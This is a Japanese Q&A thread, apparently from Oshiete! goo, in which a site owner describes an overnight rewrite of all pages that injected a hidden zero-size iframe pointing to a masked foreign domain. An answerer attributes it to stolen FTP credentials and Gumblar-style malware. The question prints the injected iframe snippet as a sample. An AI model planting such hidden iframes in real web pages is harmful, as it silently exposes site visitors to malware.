全50ページほどのWEBサイトを運営しています。
サーバーはレンタルサーバーで、FTPソフトを使用してページをアップロードしています。
先日、トップページを開いたところレイアウトがぐちゃぐちゃになっていました。
(カラム落ちしたり、ヘッダーが表示されていなかったり。)
そして、index以下のページは全て真っ白、何も表示されていない状態に。
FTPソフトで見ると、サーバー側のファイルの更新時間が、朝の8:42~43に全ページ書き換えられていました。
もちろん何もさわっていません。
ローカルファイルを一括アップロードすると元通りに回復しました。
レンタルサーバー会社のお知らせに、
「メンテナンス時に不具合が生じたようで…」とのコメント。
サーバー側の不具合か?と思っていたのですが、
真っ白になったページのソースを見てみると<body>直下に
<!--1679091c5a880faf6fb5e6087eb1b2dc-->
<iframe src="www.○○.com/70cc.php?id=codeblockstat" width="0" height="0" style="display:none;" />
<!--/1679091c5a880faf6fb5e6087eb1b2dc-->
と入っていました。もちろんこんなタグは入れていません。
急いでアップロードし直したので全ページこれだったかは定かではありませんが
おそらく「style="display:none;"」は入っていたものと思われます。
「www.○○.com」にアクセスすると、わけのわからない真っ青な外国のページでした。
(ウイルスか何かだったらいけないと思い、URLは伏せました。)
サーバーの不具合でこんなソースが混入するものでしょうか?
サイトがサイトでしたので、何か意図的なソースの書き換えだったのではないかと考えています。
そういえば以前も、朝の9:13~15にかけてサーバー側のファイルが全ページ更新されていたことがあったのですが、その時は特に実害がなかった(ように思われた)ので、パスワードもそのままにしたと思います。
「ガンプラ―ウイルス」というものにも感染したことがあるので、心配です。
こういうのはどういう方がどういう目的で発信するんでしょうかねぇ…
何かご存知の方いらっしゃいましたら教えていただけませんでしょうか。
よろしくお願いいたします。
No.2ベストアンサー
- 回答日時:
> <iframe src="www.○○.com/70cc.php?id=codeblockstat" width="0" height="0" style="display:none;" />
こんな「絶対に画面上に表示させない」ことを狙ったiframeの挿入はウイルスか不正アクセス意外には考えにくいと思います。
仮に「サーバー側の不具合」だったとしても障害の類ではなく不正アクセスやウイルス感染の類だと思われます。
サーバー運営者側が現在はまだ調査中で障害の詳細を発表できていない、という可能性は考えられますが、詳細が出ていて内容があくまでメンテナンス関連のものであれば、今回の件との関連は薄いでしょう。
それよりも気になるのは、
> 「www.○○.com」にアクセスすると、わけのわからない真っ青な外国のページでした。
何故、そんな怪しげなサイトにアクセスしちゃいますか?
該当のコードはそのサイトにユーザーをアクセスさせることが目的のコードですので、そこにアクセスした時点で一巻の終わりである可能性が非常に高いです。
アクセスすることでウイルスに感染させるなどというレベルでなく、既にウイルス感染したPCをそこにアクセスさせることで個人情報を根こそぎ引っこ抜いている可能性も十分に考えられます。
状況から、あなたのPC内のデータは全部外部に流出してしまった可能性を考慮しておくべきでしょう。
また、
> 「ガンプラ―ウイルス」というものにも感染したことがある
という経緯がありながら
> その時は特に実害がなかった(ように思われた)ので、パスワードもそのままにしたと思います。
という辺りも非常にぬるすぎます。
ほとんどダダ漏れじゃないですか。
> こういうのはどういう方がどういう目的で発信するんでしょうかねぇ…
ネットショッピングなどで利用するクレジットカードの情報などを奪う、などが主な目的です。
軽度なイタズラレベルでは、写真などの画像を抽出して、プライベートな恥ずかしい画像などがあればそれを本名・住所付きでネット上にばらまいたりする人もいますね。
仮にあなたのPCにはそのような情報がなく特に実害が無かったとしても、今回のようにFTPのパスワードを奪いあなたのサイトの情報を書き換えることで、あなたのサイトを信用して閲覧しに来る全てのユーザーに同様のウイルスを感染させ、そちらで実被害を大量に出します。
つまり、あなたがそういうウイルス対策を放置して適当に済ますことは、あなたの友人・知人に対して個人情報漏洩を幇助していることになるのです。
ご回答ありがとうございます。
やはり、ウイルスの可能性大ですか…
考えが甘かったですね。ご指摘感謝いたします。
「www.○○.com」へは、興味本位と言いますか
ウイルスなどではないかもしれないという期待もあって
アクセスしてしまいました。
ということは?
サーバー運営会社の問題ではなく、当方のFTPソフトのセキュリティ対策が甘くパスワードを奪われてしまったために、今回の件が起きたというのが有力説でしょうかねぇ…
サーバー運営会社にも問い合わせしてみたいと思います。
こちらでもFTPソフトのパスワードをまめに変えるなどして対策をしていきます。
ありがとうございました。
お探しのQ&Aが見つからない時は、教えて!gooで質問しましょう!
似たような質問が見つかりました
- ドメイン・サーバー・クラウドサービス 自作サイトをサーバーにアップロードしたのですが… 2 2022/11/08 18:12
- その他(IT・Webサービス) 301リダイレクトの使い方について 7 2022/04/05 17:50
- サーバー Laravelをレンタルサーバーにインストールするにはどうすればいいですか? 2 2022/06/29 10:17
- その他(IT・Webサービス) WEBサイト内のファイルを探す方法は? 1 2022/11/11 16:38
- WordPress(ワードプレス) ワードプレスで、投稿一覧ページにタグを表示する方法 投稿につけたタグを、記事一覧ページにもカテゴリと 1 2023/05/10 21:41
- WordPress(ワードプレス) WordPressのサイトにPDFをアップロードした際にGoogleなどの検索結果に出ないでほしい 1 2022/08/03 10:44
- ホームページ作成・プログラミング パスワードつきホームページ トップページ以下はどうなる 6 2022/08/16 12:04
- その他(パソコン・スマホ・電化製品) Webページ印刷時にヘッダー・フッターをつけたい 1 2022/04/25 21:35
- アプリ Edgeを操作するアプリについて 4 2023/05/11 22:48
- サーバー Webサイト構築フリーランスの案件受注について 1 2022/03/27 18:16
関連するカテゴリからQ&Aを探す
おすすめ情報
デイリーランキングこのカテゴリの人気デイリーQ&Aランキング
-
携帯がウイルスに感染して不便...
-
大学生です。授業でUSBメモリを...
-
コンピュータウイルス感染?
-
パソコンのウイルス対策
-
イヤホンからウイルス感染する...
-
MS32DLL..dll.vbsについて
-
ウィルス感染してしまいました。
-
postmasterにやられました。
-
Twitter Video Toolsというサイ...
-
CD-R/DVD-Rからのウィルス感染...
-
漫画喫茶等のモニターに自分の...
-
CPU切替器の安全性について
-
System Volume Information\\_r...
-
もし3DSがウイルス感染したらど...
-
dllhost.exeについて
-
VLAN で分けましたが・・。
-
スタンドアロンPCのWindows update
-
掲示板を観覧しただけでウィルス?
-
Galaxy A54 5Gのセキュリティの...
-
ぶっちゃけWindows10/11にセキ...
マンスリーランキングこのカテゴリの人気マンスリーQ&Aランキング
-
携帯がウイルスに感染して不便...
-
パソコンのウイルス対策
-
ウィルス感染してしまいました。
-
コンピュータウイルス感染?
-
大学生です。授業でUSBメモリを...
-
イヤホンからウイルス感染する...
-
ウイルス感染の外付けHDDからデ...
-
リターンメールが大量に届きます。
-
Gen:Variant.Symmi.54852 これ...
-
Appleからアダルトウイルスに感...
-
MS32DLL..dll.vbsについて
-
ノートパソコンを買ったんです...
-
USB経由のウィルスについて
-
ウィルス対策の責任は?
-
父のパソコンがウィルスに犯さ...
-
写真で友達にウイルス感染させ...
-
iPhoneで動画を見ようとしたら...
-
お願いします。助けてください...
-
Googleカレンダーのセキュリティー
-
SDカードにウィルス
おすすめ情報